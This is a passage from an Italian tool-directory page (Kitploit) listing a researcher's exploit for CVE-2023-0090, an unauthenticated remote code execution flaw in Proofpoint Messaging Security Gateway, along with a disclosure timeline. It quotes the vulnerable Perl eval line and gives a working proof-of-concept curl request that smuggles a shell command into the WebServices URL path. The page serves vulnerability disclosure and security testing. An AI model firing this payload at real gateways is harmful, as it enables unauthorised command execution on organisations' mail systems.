Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
proofpoint-CVE-2023-0090 — Proofpoint Email Gateway: RCE non autenticato | Kitploit
Strumenti/GitHubGitHub/ly1g3/proofpoint-cve-2023-0090
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubly1g3/proofpoint-cve-2023-0090

proofpoint-CVE-2023-0090

Proofpoint Email Gateway: RCE non autenticato

Vedi Repository
112 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Informazioni

Ricercatore di sicurezza: ly1g3, ly1g3[at]tuta.io

Impronta GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Panoramica: Esecuzione remota di codice - RCE non autenticata

CVE: CVE-2023-0090

Cronologia:

  • Scoperta - ly1g3
  • Segnalata - ly1g3
  • Corretta - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Exploit per Proofpoint Messaging Security Gateway

Esecuzione remota di codice (RCE)

Con accesso all'API WebServices, è possibile ottenere una RCE non autenticata con privilegi di amministratore.

Dettagli tecnici

Webservices.pm non sanitizza né controlla l'input dell'utente. Non è richiesta alcuna autenticazione per raggiungere la funzione, ma l'accesso API deve essere abilitato nelle impostazioni per poter eseguire la RCE. $module proviene direttamente dai dati dell'utente e viene valutato.

root@kitploit:~
my $module = (split(/\//,$uri))[1]; $module = SERVICE_MODULE_PREFIX() . "::\u$module"; ... eval("require $module");

POC

Crea un file chiamato abc in /tmp/. Il codice viene eseguito come utente pps.

root@kitploit:~
curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"
Scarica lo strumento